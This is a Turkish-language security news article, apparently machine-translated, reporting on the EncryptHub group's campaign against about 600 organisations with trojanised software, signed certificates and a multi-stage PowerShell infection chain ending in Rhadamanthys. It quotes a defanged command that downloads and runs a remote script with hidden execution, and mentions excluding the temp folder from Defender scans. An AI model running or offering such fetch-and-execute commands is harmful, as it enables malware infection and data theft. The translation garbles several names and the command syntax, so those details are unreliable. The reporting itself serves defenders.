EncryPthub olarak bilinen sofistike bir siber suçlu grup, çok aşamalı bir kötü amaçlı yazılım kampanyasıyla yaklaşık 600 kuruluşu başarıyla tehlikeye attı.
Tehdit oyuncusu, operasyonel güvenlik hatalarından yararlandı, yanlışlıkla altyapılarının kritik unsurlarını açığa çıkardı ve bu da araştırmacıların taktiklerini eşi görülmemiş bir derinlikle haritalamasına izin verdi.
EncryPthub’ın kampanyası, sistem verilerini toplamak, değerli bilgileri yaymak, kaçma tekniklerini yürütmek ve bilgi samanlılarını dağıtmak için birkaç PowerShell komut dosyası katmanları kullanır.
Tehdit oyuncusu, QQ Talk, Wechat, Microsoft Visual Studio 2022 ve Palo Alto Global Protect gibi yazılımların truva atış sürümlerini dağıtarak popüler uygulamaların kullanıcılarını hedefliyor.
Bu sahte uygulamalar 25 Kasım 2024 ve 1 Ocak 2025 arasında üretildi.
Bu başvurular, o zamandan beri iptal edilen “Hoa Sen Ha Nam One Üyesi Limited Limitiles Company” e kaydedilmiş biri de dahil olmak üzere meşru görünmek üzere kod imzalama sertifikaları ile imzalanmıştır.
4 Şubat 2025 itibariyle grup, “EncryPthub LLC” e kaydedilmiş yeni bir sertifika kullanmaya başladı ve gelişen taktiklerini daha da gösterdi.
.webp)
Saldırganlar ayrıca, bir telgraf botu aracılığıyla faaliyet gösteren “Labinstalls” adlı bir install ücret hizmeti de dahil olmak üzere üçüncü taraf dağıtım kanallarından yararlandı ve bu da erişimlerini genişletmelerine ve şüphesiz kurbanlara kötü niyetli yüklerin dağıtımını otomatikleştirmelerine izin verdiler.
OutPost24’ten KrakenLabs araştırmacıları, CriptoPthub’ın kripto para birimi sahipliğine, kurumsal ağ bağlantısına ve gelişmiş hedefleme yöntemlerini gösteren VPN yazılımının varlığına dayalı olarak kurbanlardan çalınan kimlik bilgileri günlüklerine öncelik verdiğini keşfetti.
Encrypthub’ın gelişen öldürme zinciri
Çok aşamalı saldırı, birinci aşama yükü indiren bir PowerShell komutunun yürütülmesi ile başlar: “PowerShell.exe -executionPolicy Bypass -Windowstyle Hidden -command“ Invoke -Restmethod -Uri ‘Hxxps: // crystryptub[.]US/EncryPthub/Fickle/Layoad.ps1 ‘/InvokeExpression ””.
Bu ilk yük, mesajlaşma oturumları, kripto cüzdanları, şifre yöneticisi dosyaları ve VPN oturumları dahil olmak üzere hassas verilerin çalmaktan sorumludur.
İkinci aşama, kod çözülmüş, değiştirilmiş ve kötü amaçlı URL’leri gömmek için yürütülen baz64 kodlu MSC dosyalarını içeren Runner.ps1’i içerir.
Üçüncü aşamada, Windows Defans’a temp klasörünü taramalardan hariç tutmasını ve ek komut dosyalarını indirmesini söyleyen bir HTML yükleyici kullanır.
Son aşama, enfeksiyon zincirini tamamlayarak Rhadamanthys kötü amaçlı yazılımları dağıtıyor.
.webp)
EncryPthub’ın öldürme zinciri, ilk yürütmeden çoklu aşamalardan son yük dağıtımına kadar ilerlemeyi gösterir.
.webp)
Grup ayrıca enfeksiyonları yöneten ve uzaktan komutlar gönderen bir komut ve kontrol paneli olan “EncryPtrat” geliştiriyor ve bu aracı yakında diğer tehdit aktörlerine ticarileştirebileceklerini gösteriyor.
.webp)
Kuruluşlara, bu gelişen tehdide karşı korunmak için çok katmanlı güvenlik stratejileri ve sürekli izleme uygulamaları tavsiye edilir.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.